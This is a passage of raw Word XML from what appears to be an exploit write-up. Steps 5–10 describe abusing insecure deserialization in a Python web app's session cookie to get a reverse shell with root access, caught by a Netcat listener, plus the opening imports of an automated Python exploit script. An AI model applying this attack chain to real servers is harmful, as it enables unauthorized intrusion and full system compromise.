          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FCA64C" w14:textId="77777777" w:rsidR="004A2581" w:rsidRDefault="004A2581" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3C6B1B" w14:textId="77777777" w:rsidR="00A7675D" w:rsidRPr="00A7675D" w:rsidRDefault="00A7675D" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49773F65" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C85432" w14:textId="6E817F17" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The vulnerable ‘</w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Settings’</w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> class which allows malicious command to execute if </w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not present in the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8EE61" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A63F7A" w14:textId="3AA1DF4E" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F009843" wp14:editId="37E3E423">
            <wp:extent cx="8229600" cy="3860800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15350014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01418"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3860800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37273C" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4804E01D" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420029CC" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752CB5B4" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2AD4A2" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61610D35" w14:textId="0454D5FC" w:rsidR="00C2531B" w:rsidRPr="00BA1A4B" w:rsidRDefault="00C47719" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="00093F7B" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6: </w:t>
      </w:r>
      <w:r w:rsidR="00500E6F" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>As the web application is expecting a ‘</w:t>
      </w:r>
      <w:r w:rsidR="00500E6F" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name’</w:t>
      </w:r>
      <w:r w:rsidR="00500E6F" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> during deserializ</w:t>
      </w:r>
      <w:r w:rsidR="00C2531B" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ation on the server side, it will throw an error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7E6DC" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6276872B" w14:textId="1B5A48B1" w:rsidR="001315D7" w:rsidRDefault="006C3589" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5568AEF0" wp14:editId="118F0C9F">
            <wp:extent cx="8229600" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191279197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91972" name="Picture 7"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3831590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F198BB9" w14:textId="77777777" w:rsidR="001315D7" w:rsidRDefault="001315D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2B5FC2" w14:textId="77777777" w:rsidR="00687191" w:rsidRDefault="00687191" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3F59A2" w14:textId="77777777" w:rsidR="00687191" w:rsidRDefault="00687191" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3365D3" w14:textId="77777777" w:rsidR="00687191" w:rsidRDefault="00687191" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64085F29" w14:textId="528B9080" w:rsidR="001315D7" w:rsidRDefault="001315D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7: The malicious object created with the help of ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="001315D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>settings.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’ available in the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33827F66" w14:textId="1F945144" w:rsidR="0051736D" w:rsidRPr="0051736D" w:rsidRDefault="0051736D" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: We have not given a hostname as it will result in no shell during execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A3A46" w14:textId="273BC157" w:rsidR="001315D7" w:rsidRDefault="001315D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B3A2376" wp14:editId="152A4468">
            <wp:extent cx="8229600" cy="957580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1531117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17586" name="Picture 15311175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957580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4136F91B" w14:textId="4BC34F21" w:rsidR="001315D7" w:rsidRDefault="001315D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8: Convert the serialized data using </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5B99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base64 encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the server is expecting a base64 encoded </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5B99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session cookie</w:t>
      </w:r>
      <w:r w:rsidR="003F5B99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58C4F2" w14:textId="23E37FBD" w:rsidR="001315D7" w:rsidRDefault="001315D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A8381F" wp14:editId="3D26D0EF">
            <wp:extent cx="8229600" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6672112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11290"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3848100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00FD2C" w14:textId="77777777" w:rsidR="00BA1A4B" w:rsidRDefault="00BA1A4B" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF87076" w14:textId="4ABFD419" w:rsidR="00024F17" w:rsidRDefault="00024F17" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 9: The malicious encoded session cookie is provided on the left and a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener catches a </w:t>
      </w:r>
      <w:r w:rsidRPr="00024F17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, giving </w:t>
      </w:r>
      <w:r w:rsidRPr="00024F17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30F8CE" w14:textId="77777777" w:rsidR="00024F17" w:rsidRDefault="00024F17" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EFA78D" w14:textId="59EE631C" w:rsidR="00024F17" w:rsidRDefault="00024F17" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295D14B2" wp14:editId="55692114">
            <wp:extent cx="8229600" cy="3870325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="208167523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75235"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29600" cy="3870325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BEF97" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFF005F" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5849A268" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7C1AF9" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AEDE1F" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D24CBDD" w14:textId="7459B75A" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 10: Automated python exploit which asks user for URL, local IP, and </w:t>
      </w:r>
      <w:r w:rsidR="00E034D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a listener port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A167B6" w14:textId="6E6C48DA" w:rsidR="00E034D7" w:rsidRPr="00E034D7" w:rsidRDefault="00E034D7" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: The highlighted part shows a successful exploitation of vulnerability, resulting in root access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF2F3B" w14:textId="77777777" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6FD1C9" w14:textId="6A451981" w:rsidR="00C615DA" w:rsidRDefault="00C615DA" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="590001A3" wp14:editId="65FA7BB8">
            <wp:extent cx="8229600" cy="3811905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79735039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0396" name="Picture 1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3811905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7BC118" w14:textId="2CB5CF36" w:rsidR="003715CC" w:rsidRDefault="003715CC" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The python code used to automate the exploitation:</w:t>
      </w:r>
      <w:r w:rsidR="00293318">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:object w:dxaOrig="1501" w:dyaOrig="983" w14:anchorId="55DB0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pt;height:49.3pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1758306239" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E085823" w14:textId="43824670" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_____________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F608C53"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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F431AF"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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422BEC5"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import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD6E3F" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7B4931"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Banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3C2A0"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print("\033[93m" + """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E6E8E" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55243625"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E0D52"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91E180"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384B5C1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D872E"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w:t>
